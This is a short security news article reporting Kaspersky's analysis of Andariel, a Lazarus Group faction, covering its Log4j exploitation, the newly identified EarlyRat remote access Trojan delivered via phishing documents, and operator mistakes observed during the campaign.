Andariel’s Mistakes Uncover New Malware in Lazarus Group Campaign

Written by

Researchers have discovered a previously undocumented malware family and exposed operational errors made by Andariel, a faction of the North Korean threat actor known as Lazarus Group. 

Kaspersky described the findings in an advisory published today, which analyzed the group’s tactics and revealed the emergence of a new threat called “EarlyRat.”

“In the vast landscape of cybercrime, we encounter numerous players and groups that operate with fluid compositions,” commented Jornt van der Wiel, a senior security researcher at Kaspersky’s Global Research & Analysis Team (GReAT).

“It is common for groups to adopt code from others and even affiliates who can be considered as independent entities, switching between different types of malware.”

Read more on North Korean hackers: US Doubles Reward for Info on North Korean Hackers

The Andariel group is known for using the DTrack malware and Maui ransomware. It first gained attention in mid-2022. 

Exploiting the Log4j vulnerability, Andariel introduced various malware families, including YamaBot and MagicRat, along with updated versions of NukeSped and DTrack. 

During an unrelated investigation, Kaspersky researchers discovered Andariel’s campaign and decided to dig deeper.

The investigation revealed that Andariel initiates infections by executing a Log4j exploit, which downloads additional malware from a command-and-control (C2) server. 

Notably, researchers observed the execution of commands by a human operator and noted numerous mistakes and typos, suggesting an inexperienced individual was behind the operation.

The researchers also identified the new malware family known as EarlyRat. Although initially believed to be downloaded via Log4j, further analysis revealed that phishing documents were the primary delivery mechanism for EarlyRat. 

The malware, categorized as a remote access Trojan (RAT), gathers system information and communicates with the C2 server using a specific template.

“Subgroups of APT groups, such as Lazarus’ Andariel, engage in typical cybercrime activities like deploying ransomware,” van der Wiel explained.

“Focusing on tactics, techniques, and procedures (TTPs), as we did with Andariel, we can significantly reduce attribution time and detect attacks at their early stages.”

The Kaspersky advisory comes weeks after blockchain analysis company Elliptic linked Lazarus Group to the Atomic Wallet heist.

What’s hot on Infosecurity Magazine?